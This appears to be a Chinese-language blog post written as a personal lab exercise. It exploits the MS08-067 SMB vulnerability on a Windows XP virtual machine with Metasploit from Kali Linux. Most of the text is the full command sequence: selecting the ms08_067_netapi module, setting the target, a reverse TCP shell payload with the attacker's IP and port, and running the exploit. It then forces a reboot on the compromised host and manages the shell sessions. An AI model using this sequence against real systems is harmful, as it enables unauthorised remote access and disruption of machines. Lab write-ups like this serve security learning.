对内网主机进行渗透并执行关机

1:渗透目标

查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。

 

2:准备阶段

2.1软件

Kali linux       Windows XP SP3 Chinese - Simplified (NX)     vmware 15 pro

2.2网络配置如下

Windows XP SP3 Chinese - Simplified (NX)  操作系统

kali 2019a

 

2.3 xp系统设置(两个关闭,三个打开)

(关闭自动更新)(关闭防火墙)否则会一直报连接超时的错误

打开三个服务(computer browser)(server)(workstation)

 

 

 

3:渗透测试阶段

3.1:整体流程图

 

3.2:执行阶段

1):查找漏洞(可在网上查找公开的平台漏洞)

命令:search ms08_067

 

 

2):选择rank等级较高的模块(这里只有一个模块),并选中模块

命令:use exploit/windows/smb/ms08_067_netapi

#上面的意思是:

exploit 可渗透攻击的模块

Windows 操作系统类型

smb

ms08_067_netapi漏洞名称

 

查看该模块的信息

命令:info

3):查找该漏洞可复现的操作系统类型

命令:show targets

这里我们利用第 34 个操作系统类型进行漏洞复现

 

4):查看该模块需要配置的参数

命令:show options

 

required 项为 yes 的为必填项

RHOSTS   要攻击的目标 IP

RPORT   要攻击的目标端口

设置要攻击的 目标ip

命令:set RHOSTS 192.168.0.100

 

查看配置参数

命令:show options

 

5):查找可用的攻击载荷

命令:show payloads

 

选择合适的攻击载荷并设置攻击载荷

命令:set payload generic/shell_reverse_tcp

 

设置攻击机的ip

命令:set lhost 192.168.0.104

设置攻击机的端口

命令:set lport 4567

设置目标ID(重要命令,一定要写的,不然没法连接)

命令:set target 34

run 之前再看一眼配置

 

6):开始渗透:

命令:exploit

 

3.3渗透完成

测试命令

重启xp

命令:shutdown -r -f -t 0

Dir查看当前文件夹

 

4:总结

从早做到晚

开始忽略了防火墙和自动更新问题

网上查找资料时,好几个解决方案弄混淆了,最后自己都不知道有些东西做没做

不知道系统会崩溃,不可逆转性崩溃

忘记给虚拟机做快照了,最后只好重做系统,设置快照

后台运行会话:background

Sessions -a #查看所有会话

Sessions -i id   # 打开ID=id 的会话

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章